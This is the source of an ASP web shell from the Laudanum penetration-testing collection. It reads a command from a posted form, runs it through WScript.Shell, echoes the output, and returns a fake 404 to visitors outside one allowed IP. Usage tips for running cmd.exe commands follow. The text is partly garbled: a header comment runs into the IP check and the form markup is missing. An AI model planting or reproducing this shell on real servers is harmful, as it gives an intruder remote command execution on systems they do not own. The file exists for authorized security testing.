<% ' ******************************************************************************* ' *** ' *** Laudanum Project ' *** A Collection of Injectable Files used during a Penetration Test ' *** ' *** More information is available at: ' *** http://laudanum.secureideas.net ' *** laudanum@secureideas.net ' *** ' *** Project Leads: ' *** Kevin Johnson ' *** ' *** Copyright 2012 by Kevin Johnson and the Laudanum Team ' *** ' ******************************************************************************** ' *** ' *** Updated and fixed by Robin Wood ' *** Updated and fixed by Tim Medin "1.2.3.4" then response.Status="404 Page Not Found" response.Write(response.Status) response.End end if if Request.Form("submit") <> "" then Dim wshell, intReturn, strPResult cmd = Request.Form("cmd") Response.Write ("Running command: " & cmd & "
") set wshell = CreateObject("WScript.Shell") Set objCmd = wShell.Exec(cmd) strPResult = objCmd.StdOut.Readall() response.write "
" & replace(replace(strPResult,"<","<"),vbCrLf,"
") & "
" set wshell = nothing end if %> Laundanum ASP Shell
Command:

Don't forget that if you want to shell command (not a specific executable) you need to call cmd.exe. It is usually located at C:\Windows\System32\cmd.exe, but to be safe just call %ComSpec%. Also, don't forget to use the /c switch so cmd.exe terminates when your command is done.

Example command to do a directory listing:
%ComSpec% /c dir


Copyright © 2012, Kevin Johnson and the Laudanum team.
Written by Tim Medin.
Get the latest version at laudanum.secureideas.net.